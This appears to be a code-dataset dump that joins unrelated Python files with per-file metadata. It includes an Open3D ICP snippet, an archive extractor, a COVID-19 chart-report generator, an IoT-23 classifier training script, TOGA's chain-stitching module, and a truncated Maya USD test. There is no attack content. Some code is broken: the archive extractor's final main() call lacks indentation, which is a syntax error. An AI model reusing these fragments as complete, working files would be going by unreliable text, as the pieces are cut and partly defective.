print(reg_p2p)
print("Transformation is:")
print(reg_p2p.transformation)
draw_registration_result(source, target, reg_p2p.transformation)

# point-to-plane ICP (requires normals on the target cloud)
print("Apply point-to-plane ICP")
reg_p2l = o3d.pipelines.registration.registration_icp(
    source, target, threshold, trans_init,
    o3d.pipelines.registration.TransformationEstimationPointToPlane())
print(reg_p2l)
print("Transformation is:")
print(reg_p2l.transformation)
draw_registration_result(source, target, reg_p2l.transformation) | 2.171875 | 2 |
uncompress/uncompress.py | Apiquet/utils | 0 | 12765003 | <gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Uncompress program for tar, tar.gz, zip, etc
Args:
- Path to the compressed file to extract
- Path to the output folder for extracted files
Example:
python3 uncompress.py -i path/to/file.tar.gz -o path/for/extractedfiles
"""
import argparse
import shutil
def extract(compressedfile, extract_path):
    '''Unpack an archive (tar, tar.gz, zip, ...) into a folder.

    The archive format is inferred from the file extension by
    ``shutil.unpack_archive``.

    Args:
        - compressedfile (str) : path to the compressed file
        - extract_path (str) : path for the extracted files
    '''
    shutil.unpack_archive(compressedfile, extract_path)
def main():
    """Parse the command line and extract the given archive.

    Required flags:
        -i/--compressedfile : archive to uncompress
        -o/--output         : destination folder for the extracted files
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--compressedfile', required=True, type=str,
                        help='Path to the file to uncompress.')
    parser.add_argument('-o', '--output', required=True, type=str,
                        help='Output path for the extracted files.')
    cli_args = parser.parse_args()
    extract(cli_args.compressedfile, cli_args.output)
if __name__ == '__main__':
main()
| 3.796875 | 4 |
report_generator.py | aravindskrishnan/COVID19-Report-Generator | 0 | 12765004 |
"""
Developer : <NAME>
VER : 1.0
Data Source : https://api.covid19india.org/v4/data.json
"""
import urllib.request
import urllib.error
import json
import matplotlib.pyplot as plt
import numpy as np
import time
from PIL import Image
from PIL import ImageFont
from PIL import ImageDraw
#Graph Plotting Function
def ploting(chart_type, chart_name, lim):
    """Draw and save a horizontal bar chart of district-wise values.

    Relies on the module-level ``districts`` tuple and ``date`` string.

    chart_type -- sequence of values, one per entry in ``districts``
    chart_name -- label used in the title and as the .png file name
    lim        -- upper limit of the x axis
    """
    plt.subplots()
    positions = np.arange(len(districts))
    plt.barh(positions, chart_type, align='center', alpha=0.6,)
    # Annotate each bar with its value.
    for idx, val in enumerate(chart_type):
        plt.text(val, idx - .2, str(val), color='red')
    plt.yticks(positions, districts)
    plt.xlabel('Cases')
    plt.xlim([0, lim])
    title = 'Districtwise ' + chart_name + ' on ' + date
    plt.title(title)
    plt.savefig(chart_name + '.png', bbox_inches='tight', pad_inches=0.2)
    plt.show()
#District Data Extraction Function
def data_district(data_type):
    """Collect one statistic (e.g. 'confirmed', 'recovered', 'deceased')
    from every district node, in the same order as ``districts``.

    Returns a tuple of 14 values.
    """
    district_nodes = (Alappuzha, Ernakulam, Idukki, Kannur, Kasargod,
                      Kollam, Kottayam, Kozhikode, Malappuram, Palakkad,
                      Pathanamthitta, Thiruvananthapuram, Thrissur, Wayanad)
    return tuple(node["total"][data_type] for node in district_nodes)
#Graph Image Pasting Function
def image_paste(image_name, x_cord, y_cord):
    """Enlarge a chart image 2.3x and paste it onto a copy of the report
    template (module-level ``img``) at position (x_cord, y_cord).

    Returns the composed image; the template itself is left untouched.
    """
    chart = Image.open(image_name)
    new_size = (round(chart.size[0] * 2.3), round(chart.size[1] * 2.3))
    chart = chart.resize(new_size)
    composed = img.copy()
    composed.paste(chart, (x_cord, y_cord))
    return composed
#Loading Constants and Data
# Today's date (dd-mm-yyyy) is reused in chart titles and the report file name.
date=time.strftime("%d-%m-%Y")
# Public COVID-19 India API; the whole response is parsed as JSON.
url = 'https://api.covid19india.org/v4/data.json'
output = urllib.request.urlopen(url).read()
tree = json.loads(output)
#Setting District Constants
# Each constant holds one Kerala ("KL") district sub-tree from the API response.
Alappuzha=tree["KL"]["districts"]["Alappuzha"]
Ernakulam=tree["KL"]["districts"]["Ernakulam"]
Idukki=tree["KL"]["districts"]["Idukki"]
Kannur=tree["KL"]["districts"]["Kannur"]
Kasargod=tree["KL"]["districts"]["Kasaragod"]
Kollam=tree["KL"]["districts"]["Kollam"]
Kottayam=tree["KL"]["districts"]["Kottayam"]
Kozhikode=tree["KL"]["districts"]["Kozhikode"]
Malappuram=tree["KL"]["districts"]["Malappuram"]
Palakkad=tree["KL"]["districts"]["Palakkad"]
Pathanamthitta=tree["KL"]["districts"]["Pathanamthitta"]
Thiruvananthapuram=tree["KL"]["districts"]["Thiruvananthapuram"]
Thrissur=tree["KL"]["districts"]["Thrissur"]
Wayanad=tree["KL"]["districts"]["Wayanad"]
# State-wide totals for the headline numbers on the report.
totalKerala=tree["KL"]["total"]
#Creating District Name Tuple
# Axis labels for the charts; order matches data_district()'s output order.
districts=('Allapuzha','Ernakulam','Idukki','Kannur','Kasargod','Kollam','Kottayam','Kozhikode','Malappuram',
           'Palakkad','Pathnamthitta','Thiruvananthapuram','Thrissur','Wayanad')
#Plotting Bar Charts
# Pull districtwise figures from the API tree and render one chart each.
cases = data_district('confirmed')  # confirmed cases
ploting(cases, 'total cases', 13500)
recovered = data_district('recovered')  # recovered cases
ploting(recovered, 'recoveries', 8000)
death = data_district('deceased')  # deaths
ploting(death, 'total deaths', 80)
# active = confirmed - recovered - deceased, computed element-wise per district.
# (Fixed: removed the dead chained alias `res` from the original assignment.)
active_cases = tuple(map(lambda i, j, k: i - j - k, cases, recovered, death))
ploting(active_cases, 'active cases', 6000)
#Report Text Generation
report_name='COVID-19 Kerala Statistics'
font='lt.otf' #Replace with prefered font name
# Load the report background and draw the headline text onto it.
img = Image.open("template.png")
img = img.convert('RGB')
draw = ImageDraw.Draw(img)
selectFont = ImageFont.truetype(font, size = 130)
draw.text( (200,100), report_name.upper(),(90,115,95), font=selectFont)
selectFont = ImageFont.truetype(font, size = 60)
draw.text( (920,260), 'DATE : '+date,(100,100,100), font=selectFont)
# Headline figures come from the state-wide totals fetched above.
draw.text( (380,660), 'Total Cases : '+str(totalKerala['confirmed']),(200,0,0), font=selectFont)
draw.text( (1350,760), 'Total Recoveries : '+str(totalKerala['recovered']),(0,200,0), font=selectFont)
draw.text( (1350,660), 'Total Deaths : '+str(totalKerala['deceased']),(50,50,50), font=selectFont)
draw.text( (380,760), 'Active Cases : '+str(totalKerala['confirmed']-totalKerala['recovered']-totalKerala['deceased']),(0,0,200), font=selectFont)
#Report Graph Pasteing
# image_paste() composites onto a COPY of the global `img`, so `img` is
# rebound after each call to accumulate the four charts onto one page.
tot=image_paste('total cases.png', 80, 1020)#Confirmed cases
img=tot
rec=image_paste('recoveries.png', 1210, 1020)#Recoveries
img=rec
det=image_paste('total deaths.png', 80, 1820)#Deaths
img=det
act=image_paste('active cases.png', 1210, 1820)#Active
# Final composite is written as report_<date>.png in the working directory.
act.save('report_'+str(date)+'.png')
| 2.375 | 2 |
src/utils/run_step04_train_models.py | Iretha/IoT23-network-traffic-anomalies-classification | 9 | 12765005 | <filename>src/utils/run_step04_train_models.py
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import GaussianNB
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import MinMaxScaler, StandardScaler
from sklearn.svm import LinearSVC
from sklearn.tree import DecisionTreeClassifier
from config import iot23_data_dir, iot23_experiments_dir
from src.iot23 import feature_selections, get_data_sample
from src.helpers.log_helper import add_logger
from src.helpers.experiments_helper import train_models
# Step 04: train the selected models over the chosen IoT-23 data samples.
add_logger(file_name='04_train_models.log')
# Selected Data Files
data_file_dir = iot23_data_dir
data_samples = [
    # get_data_sample(dataset_name='S16', rows_per_dataset_file=10_000), # ~ 1 min
    get_data_sample(dataset_name='S04', rows_per_dataset_file=5_000_000),
    get_data_sample(dataset_name='S16', rows_per_dataset_file=5_000_000),
]
# Selected Features
features = [
    feature_selections['F14'],
    feature_selections['F17'],
    feature_selections['F18'],
    feature_selections['F19'],
]
# Selected Algorithms: name -> (scaler + classifier) pipeline.
# (Was dict([(k, v), ...]); a dict literal is the idiomatic equivalent.
# Timing comments were carried over from the original.)
training_algorithms = {
    'DecisionTree': Pipeline([('normalization', StandardScaler()), ('classifier', DecisionTreeClassifier())]),  # 5 mil = 2 min
    'GaussianNB': Pipeline([('normalization', StandardScaler()), ('classifier', GaussianNB())]),  # 5 mil = 11 sec
    'LogisticRegression': Pipeline([('normalization', StandardScaler()), ('classifier', LogisticRegression())]),  # 5 mil = 20 min
    'RandomForest': Pipeline([('normalization', StandardScaler()), ('classifier', RandomForestClassifier())]),  # 5 mil = 60 min
    'SVC_linear': Pipeline([('normalization', MinMaxScaler()), ('classifier', LinearSVC())]),  # 5 mil = 60 min
    # 'MLPClassifier': Pipeline([('normalization', MinMaxScaler()), ('classifier', MLPClassifier(hidden_layer_sizes=(15,), max_iter=1000))]),  # 8.313 min
    # 'AdaBoost': Pipeline([('normalization', MinMaxScaler()), ('classifier', AdaBoostClassifier(n_estimators=1000))]),  # 5 mil = 2 min
    # 'AdaBoost_Decision_Tree': Pipeline([('normalization', StandardScaler()), ('classifier', AdaBoostClassifier(DecisionTreeClassifier(max_depth=2), n_estimators=1000))]),
    # 'GradientBoostingClassifier': Pipeline([('normalization', StandardScaler()), ('classifier', GradientBoostingClassifier())]),  # 5 mil = 60 min
}
experiments_dir = iot23_experiments_dir
# Train every (sample, feature set, algorithm) combination.
# overwrite=False presumably keeps already-computed results — confirm in train_models.
train_models(data_file_dir,
             experiments_dir,
             data_samples,
             features,
             training_algorithms,
             overwrite=False)
print('Step 04: The end.')
quit()
| 2.15625 | 2 |
newStuff.py | mts5qd/cs3240-labdemo | 0 | 12765006 | <gh_stars>0
def main():
    """Print a greeting to stdout."""
    # Fixed NameError: `hi` was an undefined name; the intent was a string literal.
    print('hi')
if __name__ == '__main__': main()
| 1.671875 | 2 |
modules/stitch_fragments.py | hillerlab/TOGA | 32 | 12765007 | #!/usr/bin/env python3
"""
Author: <NAME>.
Included in TOGA by <NAME>.
"""
import argparse
import sys
from datetime import datetime as dt
from collections import defaultdict
try:
from modules.common import make_cds_track
from modules.common import flatten
except ImportError:
from common import make_cds_track
from common import flatten
# Artificial zero-scored end points added to the chain graph for path search.
SOURCE = "SOURCE"
SINK = "SINK"
# Minimum chain orthology probability for a (gene, chain) pair to be kept.
SCORE_THRESHOLD = 0.5
# Genes whose exons are covered more than this many times on average are skipped.
EXON_COV_THRESHOLD = 1.33
# Maximum allowed overlap (in chain coordinates) between consecutive chains.
MAX_OVERLAP = 60
class Vertex:
    """A graph node carrying a genomic span, a score and outgoing edges."""
    def __init__(self, name, start, end, score):
        self.name = name
        self.start = start
        self.end = end
        self.score = score
        self.children = []  # names of vertices reachable via one outgoing edge
    def add_child(self, v):
        """Append *v* to the child list unless it is already present."""
        if v in self.children:
            return
        self.children.append(v)
class Graph:
    """Directed graph stored as an adjacency list of Vertex objects."""
    def __init__(self):
        # vertex name -> Vertex instance
        self.vertices = {}
    def add_vertex(self, vertex):
        """Register *vertex*; return False if it is not a Vertex or the
        name is already taken, True otherwise."""
        if not isinstance(vertex, Vertex):
            return False
        if vertex.name in self.vertices:
            return False
        self.vertices[vertex.name] = vertex
        return True
    def add_edge(self, parent, child):
        """Connect two registered vertices by name; return False when
        either name is unknown."""
        if parent not in self.vertices or child not in self.vertices:
            return False
        self.vertices[parent].add_child(child)
        return True
    def topological_sort_util(self, v, visited, stack):
        """Depth-first visit of *v*; vertices are prepended to *stack*
        after all their descendants have been visited."""
        visited[v] = True
        for child in self.vertices[v].children:
            if visited[child] is False:
                self.topological_sort_util(child, visited, stack)
        stack.insert(0, v)
    def topological_sort(self):
        """Return all vertex names in topological order (recursive DFS)."""
        visited = dict.fromkeys(self.vertices, False)
        stack = []
        for name in self.vertices:
            if visited[name] is False:
                self.topological_sort_util(name, visited, stack)
        return stack
    def __repr__(self):
        parts = []
        for name in self.vertices:
            parts.append(f"{name}\t{self.vertices[name].children}\n")
        return "".join(parts)
def parse_args():
    """Build the CLI parser; print help and exit when too few args are given."""
    parser = argparse.ArgumentParser()
    parser.add_argument("chain_file", help="Chain file")
    parser.add_argument(
        "chain_scores_file",
        help="XGBoost output: chain orthology probabilities",
    )
    parser.add_argument("bed_file", help="Bed file containing gene loci.")
    parser.add_argument(
        "--only_fragmented",
        "--of",
        action="store_true",
        dest="only_fragmented",
        help="Output fragmented genes only.",
    )
    # Fewer than two real arguments can never be a valid invocation.
    if len(sys.argv) < 3:
        parser.print_help()
        sys.exit(0)
    return parser.parse_args()
def read_gene_scores(score_file):
    """Read an orthology score table into a dict.

    Each data line (after a one-line header) is
    ``gene<TAB>chain_id<TAB>score``; pairs scoring below SCORE_THRESHOLD
    are discarded.

    Returns:
        dict: {gene_id: [(chain_id, score), (chain_id2, score2), ...]}
    """
    ret = defaultdict(list)
    # 'with' guarantees the file is closed even if a line fails to parse
    with open(score_file, "r") as f:
        next(f)  # skip header
        for line in f:
            line_data = line.rstrip().split()
            gene = line_data[0]
            chain_id = int(line_data[1])
            chain_score = float(line_data[2])
            if chain_score < SCORE_THRESHOLD:
                # low-probability chains are filtered out up front
                continue
            ret[gene].append((chain_id, chain_score))
    return ret
def read_chain_file(chain_file):
    """Read chain header lines from a chain file.

    Only ``chain ...`` header lines are parsed; alignment data lines are
    skipped.

    Returns:
        dict: {chain_id: (target_start, target_end)}
    """
    ret = {}
    # 'with' guarantees the file is closed even if a header fails to parse
    with open(chain_file, "r") as f:
        for line in f:
            if not line.startswith("chain"):
                continue
            line_data = line.rstrip().split()
            # per the UCSC chain header layout: 5 = tStart, 6 = tEnd, 12 = id
            start = int(line_data[5])
            end = int(line_data[6])
            chain_id = int(line_data[12])
            ret[chain_id] = (start, end)
    return ret
def read_gene_loci(bed_file):
    """Map every bed transcript to its absolute CDS exon coordinates.

    Each bed line is converted to a CDS track via make_cds_track(); the
    relative block coordinates are shifted by the chrom start.

    Returns:
        dict: {gene_name: [(exon_number, abs_start, abs_end), ...]}
    """
    # TODO: not the most optimal solution, fix it
    ret = {}
    # 'with' guarantees the file is closed even if parsing raises
    with open(bed_file, "r") as f:
        for line in f:
            cds_line = make_cds_track(line).split("\t")
            # extract absolute exon coordinates
            chrom_start = int(cds_line[1])
            name = cds_line[3]
            if name.endswith("_CDS"):
                name = name[:-4]
            block_count = int(cds_line[9])
            block_sizes = [int(x) for x in cds_line[10].split(",") if x != ""]
            block_starts = [int(x) for x in cds_line[11].split(",") if x != ""]
            # relative block coordinates -> absolute chromosome coordinates
            block_abs_starts = [block_starts[i] + chrom_start for i in range(block_count)]
            block_abs_ends = [
                block_starts[i] + block_sizes[i] + chrom_start for i in range(block_count)
            ]
            exon_coords = list(zip(range(block_count), block_abs_starts, block_abs_ends))
            ret[name] = exon_coords
    return ret
def build_chain_graph(chain_id_to_loc, intersecting_chains_wscores):
    """Create a DAG of chains ordered along the target genome.

    Vertices carry negated scores so that a shortest-path search over the
    graph corresponds to the highest-scoring chain combination.

    Raises:
        ValueError: if a chain id has no location in *chain_id_to_loc*.
    """
    chain_graph = Graph()
    # one vertex per intersecting chain, score negated
    for chain_id, score in intersecting_chains_wscores:
        start, end = chain_id_to_loc.get(chain_id, (None, None))
        if start is None:
            raise ValueError(f"Cannot find chain {chain_id}")
        chain_graph.add_vertex(Vertex(chain_id, start, end, -1 * score))
    # edge i -> j whenever chain j starts after chain i ends,
    # tolerating up to MAX_OVERLAP of overlap between the two
    for left_name, left in chain_graph.vertices.items():
        for right_name, right in chain_graph.vertices.items():
            if left_name == right_name:
                # never connect a vertex to itself
                continue
            if left.end - MAX_OVERLAP <= right.start:
                chain_graph.add_edge(left_name, right_name)
    return chain_graph
def add_source_sink_graph(graph_name):
    """Attach artificial SOURCE and SINK vertices to *graph_name*.

    Both are zero-length, zero-scored points placed at the leftmost start
    and rightmost end of the existing vertices.  SOURCE gets an edge to
    every other vertex and every other vertex gets an edge to SINK.
    """
    # positions are computed before the artificial vertices are inserted
    source_pos = min(v.start for v in graph_name.vertices.values())
    sink_pos = max(v.end for v in graph_name.vertices.values())
    graph_name.add_vertex(Vertex(SOURCE, source_pos, source_pos, 0))
    graph_name.add_vertex(Vertex(SINK, sink_pos, sink_pos, 0))
    # connect SOURCE to everything else
    for name in graph_name.vertices:
        if name != SOURCE:
            graph_name.add_edge(SOURCE, name)
    # connect everything else to SINK
    for name in graph_name.vertices:
        if name != SINK:
            graph_name.add_edge(name, SINK)
def find_shortest_path(graph_name, source, sink, sorted_vertices):
    """Shortest path in a DAG via one relaxation pass in topological order.

    Vertex scores are negative, so the minimum-score path corresponds to
    the best-scoring chain combination.

    Returns:
        tuple: (total score, list of vertex names forming the path)
    """
    # best known (score, path) per vertex; every path starts at *source*
    best = {vertex: (0, [source]) for vertex in sorted_vertices}
    # relax each outgoing edge exactly once, in topological order
    for vertex in sorted_vertices:
        for child in graph_name.vertices[vertex].children:
            candidate = best[vertex][0] + graph_name.vertices[child].score
            if candidate < best[child][0]:
                path = list(best[vertex][1])
                if vertex not in path:
                    path.append(vertex)
                best[child] = (candidate, path)
    return best[sink]
# def intersect(range_1, range_2):
# """Return intersection size."""
# return min(range_1[1], range_2[1]) - max(range_1[0], range_2[0])
def check_exon_coverage(chains, chain_id_to_loc, exons_loci):
    """For each chain, flag which gene exons it intersects.

    chains          -- iterable of chain ids
    chain_id_to_loc -- {chain_id: (start, end)}
    exons_loci      -- [(exon_number, abs_start, abs_end), ...]

    Returns:
        dict: {chain_id: [bool, one per exon]}
    """
    exon_num = len(exons_loci)
    chain_id_coverage = {}
    for chain_id in chains:
        chain_start, chain_end = chain_id_to_loc[chain_id]
        covered = [False] * exon_num
        for exon_id, exon_start, exon_end in exons_loci:
            # two intervals overlap iff each starts before the other ends
            if exon_end > chain_start and exon_start < chain_end:
                covered[exon_id] = True
        chain_id_coverage[chain_id] = covered
    return chain_id_coverage
def get_average_exon_cov(chain_to_exon_cov, exon_num):
    """Return the mean number of chains covering each exon.

    chain_to_exon_cov -- {chain_id: [bool, one per exon]}
    exon_num          -- number of exons (length of each bool list)
    """
    per_exon_hits = [0] * exon_num
    for coverage in chain_to_exon_cov.values():
        for i in range(exon_num):
            # booleans count as 1 (covered) / 0 (not covered)
            if coverage[i]:
                per_exon_hits[i] += 1
    return sum(per_exon_hits) / exon_num
def stitch_scaffolds(chain_file, chain_scores_file, bed_file, fragments_only=False):
    """Stitch chains of fragmented orthologs.

    For every gene intersected by more than one orthologous chain, build a
    DAG of compatible chains and pick the highest-scoring combination via
    a shortest-path search over negated scores.

    Args:
        chain_file: genome alignment chain file.
        chain_scores_file: XGBoost output with chain orthology probabilities.
        bed_file: bed file containing gene loci.
        fragments_only: when True, omit genes whose best path is a single chain.

    Returns:
        dict: {gene_id: [chain_id, chain_id, ...]} — the selected chain path.
    """
    gene_score_dict = read_gene_scores(chain_scores_file)
    # func read_chain_file returns data about all chains in the file
    # however, we need only orthologous ones
    # to avoid contamination with paralogous chains we further filter the
    # chain_id_to_loc dictionary
    # gene score dict: gene_id: [(chain, score), (chain, score), ...]
    # Iterate over dict values (lists of tuples), get the 1st elem of each tuple (chain_id)
    orth_chains = set(
        flatten([v[0] for v in vals] for vals in gene_score_dict.values())
    )
    chain_id_to_loc__no_filt = read_chain_file(chain_file)
    chain_id_to_loc = {
        k: v for k, v in chain_id_to_loc__no_filt.items() if k in orth_chains
    }
    genes_to_exon_coords = read_gene_loci(bed_file)
    gene_to_path = {}
    task_size = len(gene_score_dict.keys())
    count = 1
    for gene, intersecting_chains_wscores in gene_score_dict.items():
        # progress report every 500 genes
        if count % 500 == 0:
            print(f"Processing gene: {count} / {task_size}", flush=True)
        count += 1
        if len(intersecting_chains_wscores) <= 1:
            # a single chain cannot be stitched with anything
            continue
        # intersecting chains: list of tuples
        # [(chain, score), (chain, score), ...]
        # chains that intersect this gene
        exon_coords = genes_to_exon_coords.get(gene)
        if exon_coords is None:
            # must never happen
            raise ValueError(f"Cannot find a bed track for {gene}")
        # extract some extra information about exon coverage
        intersecting_chains = [x[0] for x in intersecting_chains_wscores]
        chain_id_to_exon_cov = check_exon_coverage(
            intersecting_chains, chain_id_to_loc, exon_coords
        )
        # for k, v in chain_id_to_exon_cov.items():
        #     print(k, v)
        chain_id_covers_all = {
            k: all(v for v in val) for k, val in chain_id_to_exon_cov.items()
        }
        if any(chain_id_covers_all.values()):
            # if there is a chain that covers the gene entirely: skip this
            continue
        average_exon_coverage = get_average_exon_cov(
            chain_id_to_exon_cov, len(exon_coords)
        )
        if average_exon_coverage > EXON_COV_THRESHOLD:
            # skip if each exon is covered > EXON_COV_THRESHOLD times in average
            continue
        # Initiate chain graph
        chain_graph = build_chain_graph(chain_id_to_loc, intersecting_chains_wscores)
        add_source_sink_graph(chain_graph)
        # Topologically sort chain graph
        sorted_vertices = chain_graph.topological_sort()
        # Find 'longest' (=highest scoring) path in the graph =
        # find shortest path in the graph with negative scoring vertices.
        longest_path_chain_graph = find_shortest_path(
            chain_graph, SOURCE, SINK, sorted_vertices
        )
        _, _path = longest_path_chain_graph
        path = _path[1:]  # starts with [SOURCE, ... ]
        if fragments_only and len(path) < 2:
            # this gene is covered entirely by a single chain
            continue
        gene_to_path[gene] = path
        # free the per-gene graph before processing the next gene
        del chain_graph
    return gene_to_path
if __name__ == "__main__":
t0 = dt.now()
args = parse_args()
gene_to_path = stitch_scaffolds(
args.chain_file,
args.chain_scores_file,
args.bed_file,
fragments_only=args.only_fragmented,
)
# save output
for k, v in gene_to_path.items():
v_str = ",".join(map(str, v))
print(f"{k}\t{v_str}")
elapsed = dt.now() - t0
print(f"# Elapsed: {elapsed}")
| 2.609375 | 3 |
src/openprocurement/api/interfaces.py | EBRD-ProzorroSale/openprocurement.api | 102 | 12765008 | # -*- coding: utf-8 -*-
from zope.interface import Interface
class IOPContent(Interface):
    """Marker interface identifying Openprocurement content objects."""
class IContentConfigurator(Interface):
    """Marker interface for content configurator adapters."""
| 1.421875 | 1 |
test/lib/mayaUsd/fileio/testAddMayaReference.py | sun-frog/maya-usd | 0 | 12765009 | <reponame>sun-frog/maya-usd
#!/usr/bin/env python
#
# Copyright 2022 Autodesk
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import fixturesUtils
import mayaUsd
import mayaUtils
from pxr import Tf, Usd, Kind
from maya import cmds
from maya import standalone
import mayaUsdAddMayaReference
import mayaUsdMayaReferenceUtils as mayaRefUtils
import os, unittest
class AddMayaReferenceTestCase(unittest.TestCase):
    '''Test Add Maya Reference.

    Each test creates a fresh Maya scene with an empty USD stage, then adds
    a Maya Reference prim via mayaUsdAddMayaReference.createMayaReferencePrim
    and checks the resulting prim, variant sets and group prims.
    '''
    pluginsLoaded = False
    # Path to a pure Maya scene file shared by all tests (set in setUpClass).
    mayaSceneStr = None
    # USD stage of the proxy shape (recreated for every test in setUp).
    stage = None
    kDefaultNamespace = 'simpleSphere'
    @classmethod
    def setUpClass(cls):
        fixturesUtils.setUpClass(__file__)
        # Create a pure Maya scene to reference in.
        import os
        cls.mayaSceneStr = mayaUtils.createSingleSphereMayaScene(os.getcwd())
    @classmethod
    def tearDownClass(cls):
        standalone.uninitialize()
    def setUp(self):
        # Start each test with a new scene with empty stage.
        cmds.file(new=True, force=True)
        import mayaUsd_createStageWithNewLayer
        self.proxyShapePathStr = mayaUsd_createStageWithNewLayer.createStageWithNewLayer()
        self.stage = mayaUsd.lib.GetPrim(self.proxyShapePathStr).GetStage()
    def testDefault(self):
        '''Test the default options for Add Maya Reference.
        Add a Maya Reference using the defaults (no group or variant).
        '''
        kDefaultPrimName = mayaRefUtils.defaultMayaReferencePrimName()
        # Since this is a brand new prim, it should not have variant sets.
        primTestDefault = self.stage.DefinePrim('/Test_Default', 'Xform')
        primPathStr = self.proxyShapePathStr + ',/Test_Default'
        self.assertFalse(primTestDefault.HasVariantSets())
        mayaRefPrim = mayaUsdAddMayaReference.createMayaReferencePrim(
            primPathStr,
            self.mayaSceneStr,
            self.kDefaultNamespace)
        # The prim should not have any variant set.
        self.assertFalse(primTestDefault.HasVariantSets())
        # Verify that a Maya Reference prim was created.
        self.assertTrue(mayaRefPrim.IsValid())
        self.assertEqual(str(mayaRefPrim.GetName()), kDefaultPrimName)
        self.assertEqual(mayaRefPrim, primTestDefault.GetChild(kDefaultPrimName))
        self.assertTrue(mayaRefPrim.GetPrimTypeInfo().GetTypeName(), 'MayaReference')
        # Test an error creating the Maya reference prim by disabling permission to edit on the
        # edit target layer.
        editTarget = self.stage.GetEditTarget()
        editLayer = editTarget.GetLayer()
        editLayer.SetPermissionToEdit(False)
        badMayaRefPrim = mayaUsdAddMayaReference.createMayaReferencePrim(
            primPathStr,
            self.mayaSceneStr,
            self.kDefaultNamespace,
            mayaReferencePrimName='BadMayaReference')
        self.assertFalse(badMayaRefPrim.IsValid())
        # Restore edit permission so later operations are unaffected.
        editLayer.SetPermissionToEdit(True)
    def testDefineInVariant(self):
        '''Test the "Define in Variant" options.
        Add a Maya Reference with a (default) variant set.
        '''
        kDefaultPrimName = mayaRefUtils.defaultMayaReferencePrimName()
        kDefaultVariantSetName = mayaRefUtils.defaultVariantSetName()
        kDefaultVariantName = mayaRefUtils.defaultVariantName()
        # Create another prim with default variant set and name.
        primTestVariant = self.stage.DefinePrim('/Test_Variant', 'Xform')
        primPathStr = self.proxyShapePathStr + ',/Test_Variant'
        mayaRefPrim = mayaUsdAddMayaReference.createMayaReferencePrim(
            primPathStr,
            self.mayaSceneStr,
            self.kDefaultNamespace,
            variantSet=(kDefaultVariantSetName, kDefaultVariantName),
            mayaAutoEdit=True)
        # Make sure the prim has the variant set and variant.
        self.assertTrue(primTestVariant.HasVariantSets())
        vset = primTestVariant.GetVariantSet(kDefaultVariantSetName)
        self.assertTrue(vset.IsValid())
        self.assertEqual(vset.GetName(), kDefaultVariantSetName)
        self.assertTrue(vset.GetVariantNames())
        self.assertTrue(vset.HasAuthoredVariant(kDefaultVariantName))
        self.assertEqual(vset.GetVariantSelection(), kDefaultVariantName)
        # Verify that a Maya Reference prim was created.
        self.assertTrue(mayaRefPrim.IsValid())
        self.assertEqual(str(mayaRefPrim.GetName()), kDefaultPrimName)
        self.assertEqual(mayaRefPrim, primTestVariant.GetChild(kDefaultPrimName))
        self.assertTrue(mayaRefPrim.GetPrimTypeInfo().GetTypeName(), 'MayaReference')
        # Verify that the Maya reference prim is inside the variant,
        # and that it has the expected metadata.
        attr = mayaRefPrim.GetAttribute('mayaReference')
        self.assertTrue(attr.IsValid())
        self.assertTrue(os.path.samefile(attr.Get().resolvedPath, self.mayaSceneStr))
        attr = mayaRefPrim.GetAttribute('mayaNamespace')
        self.assertTrue(attr.IsValid())
        self.assertEqual(attr.Get(), self.kDefaultNamespace)
        attr = mayaRefPrim.GetAttribute('mayaAutoEdit')
        self.assertTrue(attr.IsValid())
        self.assertEqual(attr.Get(),True)
        # Test an error creating the Variant Set by disabling permission to edit on the
        # edit target layer.
        editTarget = self.stage.GetEditTarget()
        editLayer = editTarget.GetLayer()
        editLayer.SetPermissionToEdit(False)
        badMayaRefPrim = mayaUsdAddMayaReference.createMayaReferencePrim(
            primPathStr,
            self.mayaSceneStr,
            self.kDefaultNamespace,
            mayaReferencePrimName='PrimVariantFail',
            variantSet=('VariantFailSet', 'VariantNameFail'),
            mayaAutoEdit=False)
        self.assertFalse(badMayaRefPrim.IsValid())
        # Restore edit permission so later operations are unaffected.
        editLayer.SetPermissionToEdit(True)
    def testBadNames(self):
        '''Test using bad prim and variant names.
        Add a Maya Reference using a bad Maya Reference prim name and
        bad Variant Set and Variant name.
        '''
        kDefaultPrimName = mayaRefUtils.defaultMayaReferencePrimName()
        # Create another prim to test sanitizing variant set and name.
        primTestSanitizeVariant = self.stage.DefinePrim('/Test_SanitizeVariant', 'Xform')
        primPathStr = self.proxyShapePathStr + ',/Test_SanitizeVariant'
        # Invalid identifiers should be sanitized via Tf.MakeValidIdentifier.
        kBadPrimName = ('3'+kDefaultPrimName+'$')
        kGoodPrimName = Tf.MakeValidIdentifier(kBadPrimName)
        kBadVariantSetName = 'No Spaces or Special#Chars'
        kGoodVariantSetName = Tf.MakeValidIdentifier(kBadVariantSetName)
        kBadVariantName = '3no start digits'
        kGoodVariantName = Tf.MakeValidIdentifier(kBadVariantName)
        mayaRefPrim = mayaUsdAddMayaReference.createMayaReferencePrim(
            primPathStr,
            self.mayaSceneStr,
            self.kDefaultNamespace,
            mayaReferencePrimName=kBadPrimName,
            variantSet=(kBadVariantSetName, kBadVariantName))
        # Make sure the prim has the variant set and variant with
        # the sanitized names.
        self.assertTrue(primTestSanitizeVariant.HasVariantSets())
        vset = primTestSanitizeVariant.GetVariantSet(kGoodVariantSetName)
        self.assertTrue(vset.IsValid())
        self.assertEqual(vset.GetName(), kGoodVariantSetName)
        self.assertTrue(vset.GetVariantNames())
        self.assertTrue(vset.HasAuthoredVariant(kGoodVariantName))
        self.assertEqual(vset.GetVariantSelection(), kGoodVariantName)
        # Verify that the prim was created with the good name.
        self.assertTrue(mayaRefPrim.IsValid())
        self.assertEqual(str(mayaRefPrim.GetName()), kGoodPrimName)
        self.assertEqual(mayaRefPrim, primTestSanitizeVariant.GetChild(kGoodPrimName))
        self.assertTrue(mayaRefPrim.GetPrimTypeInfo().GetTypeName(), 'MayaReference')
        # Adding a Maya Reference with the same name should produce an error.
